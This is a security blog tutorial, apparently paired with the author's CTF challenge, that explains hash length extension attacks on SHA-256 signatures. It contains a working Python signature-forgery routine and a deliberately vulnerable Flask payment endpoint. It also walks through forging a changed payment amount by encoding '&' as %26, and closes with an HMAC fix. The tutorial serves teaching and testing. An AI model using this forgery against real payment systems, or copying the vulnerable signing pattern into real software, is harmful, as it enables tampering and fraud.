Understanding Length Extension Attacks



In many real-world penetration tests, black-box testing limits your ability to see what’s happening under the hood. Without access to the source code, it’s difficult to fully understand an application’s internal logic, security controls, and more complex vulnerabilities. Yet, some of the most critical and fascinating security flaws are hidden within the source code and remain harder to detect through black-box testing alone.

Today, I’ll be discussing one such vulnerability — Length Extension attacks. To help illustrate this attack in a hands-on way, I’ve created a CTF challenge, which is available on my GitHub page if you’d like to follow along.

https://github.com/mroyx/length-extension-ctf

Length extension attacks target hash functions such as MD5, SHA-1, and SHA-256 that follow the Merkle-Damgård construction. The digest these functions output is their complete internal state after the final block, so an attacker who knows a hash can resume hashing from it and compute a valid hash for an extended message.

If the attacker can guess the length of the secret, they can forge messages that pass verification checks. This can lead to authentication bypasses, tampering, and other security flaws in systems that build integrity or signature checks by hashing a secret prepended to the message.
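
To see why the secret's length is enough, it helps to look at the padding itself. The sketch below computes the padding SHA-256 appends to an input of a given length. It depends only on that length, never on the content. The function name `sha256_padding` and the 16-byte secret length are assumptions made for illustration. MD5 uses the same layout but stores the length in little-endian order.

```python
import struct

BLOCK_SIZE = 64  # SHA-256, like MD5 and SHA-1, processes 64-byte blocks


def sha256_padding(message_len: int) -> bytes:
    """Return the padding SHA-256 appends to an input of message_len bytes."""
    # One 0x80 byte, then zero bytes until 8 bytes remain in the block,
    # then the input length in bits as a big-endian 64-bit integer.
    zeros = (BLOCK_SIZE - 9 - message_len) % BLOCK_SIZE
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", message_len * 8)


# Hypothetical values: the attacker only needs to guess secret_len.
secret_len = 16
message = b"Hi, Bob. Please approve the transaction."
padding = sha256_padding(secret_len + len(message))

print(padding.hex())
# The padded input always ends on a block boundary.
print((secret_len + len(message) + len(padding)) % BLOCK_SIZE)
```

If the guess for the secret length is wrong, the padding is wrong and the forged hash will not verify, which is why attackers typically try a range of lengths.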

hash_extender is a command-line utility created by Ron Bowes to simplify the process of performing length extension attacks. Instead of manually reconstructing the internal state of a hash function or calculating padding by hand, this tool automates everything.

To use it, you provide the original hash, the known portion of the message, the length of the secret key, and the data you want to append. The tool then generates a new valid hash for the extended input.

The tool is available on GitHub:

https://github.com/iagox86/hash_extender

To demonstrate, let’s say Alice sends Bob the following message:

Hi, Bob. Please approve the transaction.

To ensure authenticity, she signs it using SHA256 (secret + message), resulting in the following hash:

Eve intercepts the message and hash. While she doesn’t know the secret key, she does know its length, which is enough to exploit the hash function’s structure. She appends:

And don’t forget to send $5,000 to Eve.

Eve’s able to forge a new message and compute a valid hash that would pass verification — as if it had been signed by Alice herself.
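
As a rough sketch of what a tool like hash_extender automates (this is not hash_extender's code), the example below performs the same forgery in pure Python. Because hashlib does not let you set a hash object's internal state, it includes a small SHA-256 compression function. The names `extend`, `md_padding`, and `sha256_compress`, as well as the 16-byte secret, are assumptions made for illustration.

```python
import hashlib
import struct

MASK = 0xFFFFFFFF


def _icbrt(n):
    """Floor of the cube root of n, found by binary search."""
    lo, hi = 0, 1 << ((n.bit_length() + 2) // 3 + 1)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** 3 <= n:
            lo = mid
        else:
            hi = mid - 1
    return lo


def _primes(count):
    found, n = [], 2
    while len(found) < count:
        if all(n % p for p in found):
            found.append(n)
        n += 1
    return found


# SHA-256 round constants: fractional bits of the cube roots of the first 64 primes.
K = [_icbrt(p << 96) & MASK for p in _primes(64)]


def _rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK


def sha256_compress(state, block):
    """Apply the SHA-256 compression function to one 64-byte block."""
    w = list(struct.unpack(">16I", block))
    for i in range(16, 64):
        s0 = _rotr(w[i - 15], 7) ^ _rotr(w[i - 15], 18) ^ (w[i - 15] >> 3)
        s1 = _rotr(w[i - 2], 17) ^ _rotr(w[i - 2], 19) ^ (w[i - 2] >> 10)
        w.append((w[i - 16] + s0 + w[i - 7] + s1) & MASK)
    a, b, c, d, e, f, g, h = state
    for i in range(64):
        big_s1 = _rotr(e, 6) ^ _rotr(e, 11) ^ _rotr(e, 25)
        ch = (e & f) ^ (~e & g)
        t1 = (h + big_s1 + ch + K[i] + w[i]) & MASK
        big_s0 = _rotr(a, 2) ^ _rotr(a, 13) ^ _rotr(a, 22)
        maj = (a & b) ^ (a & c) ^ (b & c)
        t2 = (big_s0 + maj) & MASK
        a, b, c, d, e, f, g, h = (t1 + t2) & MASK, a, b, c, (d + t1) & MASK, e, f, g
    return [(s + v) & MASK for s, v in zip(state, (a, b, c, d, e, f, g, h))]


def md_padding(total_len):
    zeros = (55 - total_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", total_len * 8)


def extend(digest_hex, known_message, secret_len, append):
    """Forge (message, signature) from a known digest without the secret."""
    # The digest is the internal state after secret + message + padding.
    state = list(struct.unpack(">8I", bytes.fromhex(digest_hex)))
    glue = md_padding(secret_len + len(known_message))
    processed_len = secret_len + len(known_message) + len(glue)
    # Resume hashing with the appended data and padding for the new total length.
    tail = append + md_padding(processed_len + len(append))
    for i in range(0, len(tail), 64):
        state = sha256_compress(state, tail[i:i + 64])
    return known_message + glue + append, struct.pack(">8I", *state).hex()


secret = b"hypothetical-key"  # never passed to extend(); only its length is used
message = b"Hi, Bob. Please approve the transaction."
signature = hashlib.sha256(secret + message).hexdigest()

forged_message, forged_signature = extend(
    signature, message, len(secret), b" And don't forget to send $5,000 to Eve."
)
# Bob's check: recompute SHA256(secret + message) over the forged message.
print(hashlib.sha256(secret + forged_message).hexdigest() == forged_signature)
```

The forged message is the original message, then the padding bytes, then Eve's text, which is why the padding ends up embedded in what Bob receives.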

The decoded message can be seen below.

Hi, Bob. Please approve the transaction.�� And don’t forget to send $5,000 to Eve.

It’s important to note that the � replacement characters appear due to padding bytes inserted during the hashing process. These are not part of the original or appended messages — they’re required by the hash function to process input correctly and are what make the attack possible.

To confirm the attack worked, we can prepend the secret and recompute the hash. The resulting hash matches the forged one generated by hash_extender, proving that the new message passes verification successfully. The screenshot below demonstrates this.

For a more practical example, consider the following code:

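import hashlib

from flask import Flask, jsonify, request

app = Flask(__name__)
SECRET_KEY = "change-me"  # placeholder; the real key is not shown in the article

@app.route('/process_payment', methods=['POST'])
def process_payment():
    transaction_id = request.form.get("transaction_id")
    amount = request.form.get("amount")
    received_sign = request.form.get("sign")

    # Rebuild the signed string from the parsed form fields
    request_body = f"transaction_id={transaction_id}&amount={amount}"
    expected_sign = generate_hash(request_body)

    if received_sign != expected_sign:
        return jsonify(success=False, error="Invalid signature — possible tampering detected!"), 403

    # Payment handling is not part of the excerpt; placeholder response
    return jsonify(success=True)

def generate_hash(request_body):
    # Vulnerable construction: SHA256(secret + message)
    hash_input = (SECRET_KEY + request_body).encode()
    return hashlib.sha256(hash_input).hexdigest()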

The transaction is signed using a secret key that is unknown to the attacker. The transaction is then verified to prevent tampering. Therefore, if an attacker tries to modify any of the request parameters, the signature becomes invalid, causing the request to fail, as shown in the screenshots below.
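
The tamper check can be reproduced outside Flask with a few lines. This is a minimal sketch that reuses the same SHA256(secret + body) construction. The secret and the parameter values (`1001`, `100`, `1`) are hypothetical.

```python
import hashlib

SECRET_KEY = "hypothetical-secret"  # placeholder; the real key is unknown


def generate_hash(request_body: str) -> str:
    # Same construction as the server code: SHA256(secret + body).
    return hashlib.sha256((SECRET_KEY + request_body).encode()).hexdigest()


original_body = "transaction_id=1001&amount=100"
sign = generate_hash(original_body)

# An attacker changes the amount but has to reuse the old signature.
tampered_body = "transaction_id=1001&amount=1"

print(generate_hash(original_body) == sign)  # untouched body still verifies
print(generate_hash(tampered_body) == sign)  # modified body no longer verifies
```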

This verification seems like it should be secure since any modification to the request would result in a signature mismatch, preventing unauthorized changes. However, the vulnerability lies in how the signature is generated — using a hash function that is vulnerable to a length extension attack. This allows an attacker to forge a valid signature for a modified request, without knowing the secret key.

To effectively exploit this attack, an attacker could manipulate the appended data so that it gets processed by the server. For instance, they could send a duplicate request parameter along with a newly generated signature. If the server processes the attacker’s parameter for execution while still using the original parameter for signature validation, the attack succeeds.

However, web frameworks handle duplicate request parameters inconsistently: some return the first occurrence, while others return the last. For example, the Django and Flask code samples below read the same parameter differently. Django's request.GET.get returns the last occurrence, while Flask's request.args.get returns the first.

from django.http import JsonResponse

def show_parameters(request):
    param = request.GET.get('parameter')
    return JsonResponse({
        "parameter": param,
    })

from flask import Flask, request, jsonify

app = Flask(__name__)

@app.route('/test')
def show_parameters():
    param = request.args.get('parameter')
    return jsonify({
        "parameter": param
    })

if __name__ == '__main__':
    app.run(port=5000, debug=True)
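
The difference can also be shown without either framework. The sketch below uses only the standard library to parse a query string with a duplicated key and then picks the first or the last value, which is the choice each framework's `get` makes for you. The query string is a made-up example.

```python
from urllib.parse import parse_qs

query = "parameter=first&parameter=second"

# parse_qs keeps every occurrence, in the order it appeared in the request.
values = parse_qs(query)["parameter"]

first_wins = values[0]   # what a "first occurrence" lookup returns
last_wins = values[-1]   # what a "last occurrence" lookup returns

print(values, first_wins, last_wins)
```

Both frameworks also expose a `getlist` method on the same objects, which returns all values and makes duplicates visible.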

Since the original data is used to create the signature, this data must also be included in the modified request. In other words, the application must process both parameters but use the duplicate value for execution while keeping the original value for signature validation.

Another challenge when executing this attack is handling the padding. Merkle-Damgård hash functions such as MD5, SHA-1, and SHA-256 begin their padding with the byte \x80, but a lone \x80 is not a valid UTF-8 sequence. When included in a request, it often gets decoded as a replacement character (�), which alters the message and breaks the hash comparison. As a result, the server fails to reproduce the hash the attacker computed, causing the attack to fail even if the vulnerability is present.
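
The effect is easy to reproduce in isolation. The following sketch decodes the padding byte as UTF-8 the way a lenient text decoder would, re-encodes it, and compares the hashes. It only illustrates the encoding problem and is not taken from the server code.

```python
import hashlib

padding_byte = b"\x80"

# Strict UTF-8 decoding rejects a lone 0x80 byte.
try:
    padding_byte.decode("utf-8")
    strict_ok = True
except UnicodeDecodeError:
    strict_ok = False

# Lenient decoding substitutes U+FFFD, which re-encodes to three different bytes.
decoded = padding_byte.decode("utf-8", errors="replace")
round_tripped = decoded.encode("utf-8")

print(strict_ok, repr(decoded), round_tripped)
# The bytes changed, so any hash computed over them changes as well.
print(hashlib.sha256(padding_byte).digest() == hashlib.sha256(round_tripped).digest())
```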

To demonstrate this issue, a payload was generated using hash_extender based on the request details above.

The payload was then sent to the server.

The Flask server log revealed that the padding byte did not decode correctly, resulting in a mismatched hash and ultimately causing the attack to fail.

As an alternative, we can try sending our payload as raw bytes. A hash function only operates on bytes, so a string and its encoded byte representation produce the same digest, and we can verify this with the following example:
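
One way to check this is the minimal sketch below. It is an illustration rather than the exact check used for the challenge. It also shows a pitfall: an escape sequence typed out as text is four ordinary characters, not the single byte it stands for. The sample string `amount=100` is arbitrary.

```python
import hashlib

# hashlib only accepts bytes; a str has to be encoded first.
text = "amount=100"
same = hashlib.sha256(text.encode()).digest() == hashlib.sha256(b"amount=100").digest()

raw_byte = b"\x80"        # the single padding byte
literal_text = rb"\x80"   # four ASCII characters: backslash, x, 8, 0
differs = hashlib.sha256(raw_byte).digest() != hashlib.sha256(literal_text).digest()

print(same, differs, len(raw_byte), len(literal_text))
```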

However, the attack fails again. As shown in the screenshot below, Flask automatically escapes the backslashes in the payload, which alters the input and results in an incorrect hash calculation.

While these encoding issues introduce additional challenges to the attack, it’s important to note that some character encodings, such as Latin-1, do map the byte \x80 to a character, and not all web servers escape backslashes by default. Under certain circumstances, attackers may therefore still be able to exploit this vulnerability despite the added complexity. To fully demonstrate the vulnerability, I’ve modified the source code in the CTF challenge I created to automatically URL-decode %80.

After updating the source code, the same payload was sent — but the attack still failed.

The server log shows that Flask is now correctly decoding the padding byte, so we need to take a closer look at why the attack is not working.

To understand why this vulnerability works, and why it can fail, it’s important to know exactly how the signature is generated and how input is processed on the backend. Without access to the source code, this can be challenging.

In our case, the transaction_id and amount parameters are concatenated with a secret key and then hashed. The server verifies the request by comparing the hash, which helps detect tampering.

The attack fails initially because we’re sending two amount parameters, and Flask (by default) uses only the first occurrence. The appended amount is therefore left out of the string the server hashes, and the recomputed hash does not match the forged one.

To bypass this, we can URL-encode the & character that separates transaction_id and the first amount parameter as %26. This tricks the backend into interpreting the entire string, including the original amount and the padding, as part of a single transaction_id value.

The server splits the body into parameters before decoding it, so %26 becomes & only inside the transaction_id value. The string the server rebuilds and hashes then matches the forged message exactly, but the original amount is no longer recognized as a separate, duplicate parameter. As a result, the original amount value used in the hash remains intact, while the attacker’s value is processed during execution. This allows the hash to remain valid, and the attack succeeds, as shown below:
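
The parsing behavior behind this trick can be sketched with the standard library alone. The example below mimics a server that keeps the first occurrence of each form field and rebuilds the signed string from the parsed values. It then compares the result with the message a forged signature would cover. The helper names, the 16-byte secret length, the parameter values, and the use of Latin-1 to decode the padding bytes are all assumptions made for illustration.

```python
import struct
from urllib.parse import parse_qsl, quote_from_bytes


def md_padding(total_len: int) -> bytes:
    zeros = (55 - total_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", total_len * 8)


def first_values(body: str) -> dict:
    """Parse a form body, keeping the first occurrence of each key."""
    parsed = {}
    for key, value in parse_qsl(body, encoding="latin-1"):
        parsed.setdefault(key, value)
    return parsed


def rebuild(body: str) -> bytes:
    """Rebuild the string the server would hash from the parsed fields."""
    form = first_values(body)
    rebuilt = f"transaction_id={form.get('transaction_id')}&amount={form.get('amount')}"
    return rebuilt.encode("latin-1")


secret_len = 16  # hypothetical guess
original = b"transaction_id=1001&amount=100"
glue = md_padding(secret_len + len(original))
forged = original + glue + b"&amount=1"  # what the forged signature covers

encoded_glue = quote_from_bytes(glue)
plain_body = "transaction_id=1001&amount=100" + encoded_glue + "&amount=1"
tricked_body = "transaction_id=1001%26amount=100" + encoded_glue + "&amount=1"

# Duplicate amount: the first one swallows the padding, the second is ignored.
print(rebuild(plain_body) == forged)
# Encoded ampersand: everything up to the padding lands in transaction_id.
print(rebuild(tricked_body) == forged)
print(first_values(tricked_body)["amount"])
```

With the encoded ampersand, the only amount the server sees is the attacker's, and the rebuilt string is byte-for-byte the forged message.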

Length extension attacks highlight how subtle cryptographic design choices can introduce powerful vulnerabilities. While the concept behind the attack is relatively simple, successfully pulling it off in practice requires a deep understanding of how an application processes input, handles encoding, and generates hashes.

From estimating the secret key’s length to navigating character encoding quirks and web framework behavior, each step presents a new challenge. That complexity is what makes this attack so compelling — it’s not just about exploiting a bug, but about aligning many moving parts to take advantage of a very specific weakness.

Unlike common web vulnerabilities, length extension attacks depend on narrow and well-defined conditions, which is why they’re often missed in typical black-box testing. But by dissecting each layer of the exploit and recreating the exact environment it needs, we gain a clearer understanding of cryptographic internals — and a stronger appreciation for using secure primitives like HMAC in modern applications.
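
For comparison, here is a minimal sketch of the same signing step built on HMAC from Python's standard library. An HMAC digest is not the exposed internal state of a hash over secret + message, so it cannot be extended in this way. The key and request body are hypothetical, and the function names are chosen for illustration.

```python
import hashlib
import hmac

SECRET_KEY = b"hypothetical-secret"  # placeholder key for illustration


def sign(request_body: str) -> str:
    # HMAC-SHA256 keyed with the secret, instead of SHA256(secret + body).
    return hmac.new(SECRET_KEY, request_body.encode(), hashlib.sha256).hexdigest()


def verify(request_body: str, received_sign: str) -> bool:
    # compare_digest compares in constant time to avoid timing leaks.
    return hmac.compare_digest(sign(request_body), received_sign)


body = "transaction_id=1001&amount=100"
signature = sign(body)

print(verify(body, signature))
print(verify(body + "&amount=1", signature))
```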

If you have any thoughts, questions, or suggestions for improvement, I’d be happy to hear them. Thank you for reading!
